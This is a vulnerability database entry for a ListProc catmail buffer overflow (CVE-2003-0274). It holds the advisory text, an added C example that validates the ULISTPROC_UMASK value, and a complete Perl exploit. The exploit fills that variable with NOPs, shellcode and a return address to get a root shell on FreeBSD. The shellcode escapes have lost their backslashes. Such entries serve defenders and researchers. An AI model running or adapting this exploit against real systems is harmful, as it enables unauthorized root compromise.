ListProc Buffer Overflow Vulnerability

Vulnerability ID: 1107309
Vulnerability type: Buffer overflow
Published: 2003-05-08
Updated: 2003-05-27
CVE ID: CVE-2003-0274
CNNVD-ID: CNNVD-200305-069
Platform: FreeBSD
CVSS score: 10.0
|Vulnerability Source
https://www.exploit-db.com/exploits/22573
https://www.securityfocus.com/bid/82820
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-069
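|Vulnerability Details
A buffer overflow vulnerability exists in catmail in ListProc 8.2.09 and earlier versions. A remote attacker can execute arbitrary code via an overly long ULISTPROC_UMASK value.
|Exploit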
source: http://www.securityfocus.com/bid/7533/info

ListProc catmail has been reported prone to a buffer overflow vulnerability when handling a ULISTPROC_UMASK environment variable of excessive length.

The issue is likely due to a lack of sufficient bounds checking performed when copying the contents of the ULISTPROC_UMASK environment variable into an internal memory buffer.

Ultimately an attacker may exploit this vulnerability to execute arbitrary operation codes. Code execution would occur in the context of the ListProc catmail application, typically root.

It should be noted that while this vulnerability has been reported to affect ListProc 8.2.09, other versions might also be affected.
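
The description above attributes the overflow to an unchecked copy of ULISTPROC_UMASK into a fixed-size buffer. As an added example (not ListProc's code, which this page does not show), the C sketch below validates such a value in place before use; the 4-digit octal format, the function names and the fallback mask are assumptions.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define UMASK_MAX_DIGITS 4  /* assumption: value is an octal mode such as "0077" */

/* Validate an untrusted umask string without copying it anywhere.
 * Returns 0 and stores the mask in *out, or -1 if the value is missing,
 * empty, too long, not octal, or outside 0..0777. */
int parse_umask(const char *val, mode_t *out)
{
    size_t n;
    unsigned long m;

    if (val == NULL || out == NULL)
        return -1;
    /* Length of the leading octal run; nothing is copied, so there is
     * no destination buffer for an oversized value to overrun. */
    n = strspn(val, "01234567");
    if (n == 0 || n > UMASK_MAX_DIGITS || val[n] != '\0')
        return -1;
    errno = 0;
    m = strtoul(val, NULL, 8);
    if (errno != 0 || m > 0777)
        return -1;
    *out = (mode_t)m;
    return 0;
}

/* Hypothetical caller: fall back to a restrictive mask on any bad input. */
mode_t umask_or_default(const char *val, mode_t fallback)
{
    mode_t m;
    return parse_umask(val, &m) == 0 ? m : fallback;
}

int main(void)
{
    mode_t m = umask_or_default(getenv("ULISTPROC_UMASK"), 077);
    printf("using umask %04o\n", (unsigned)m);
    return 0;
}
```

Because the value is parsed where it sits in the environment, its length never determines how much memory is written, which is the property the reported copy lacked.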

#!/usr/bin/perl -w
# DSR-listproc.pl - kokaninATdtors.net vs. listproc 8.2.09 (bug found by KF)
# as per http://www.packetstormsecurity.nl/0305-advisories/srt2003-1137.txt
# offset, retaddr and shellcode is for my FreeBSD 4.8-RELEASE, YMMV
# shellcode by eSDee, hello there eSDee
# dont forget to edit the path to the catmail binary
# this yields uid(0) if listproc is installed by root, otherwise something else

$len = 16534;
$ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. � eye)
$nop = "x90";                                        
$shellcode =    "x31xc0x50x50xb0x17xcdx80x31xc0x50x68".
                "x2fx2fx73x68x68x2fx62x69x6ex89xe3x50".
                "x54x53x50xb0x3bxcdx80x31xc0xb0x01xcdx80";
                                                      
for ($i = 0; $i < $len - (length($shellcode)-8); $i++) {
    $buffer .= $nop;                                  
}                                                     
$buffer .= $shellcode;                                
$buffer .= $ret x 2;                                  
local($ENV{'ULISTPROC_UMASK'}) = $buffer;             
system("catmail");
|Affected Products
CREN ListProc 8.2.9
|References

Source: BUGTRAQ
Name: 20030508 SRT2003-05-08-1137 - ListProc mailing list ULISTPROC_UMASK overflow
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105241224228693&w=2
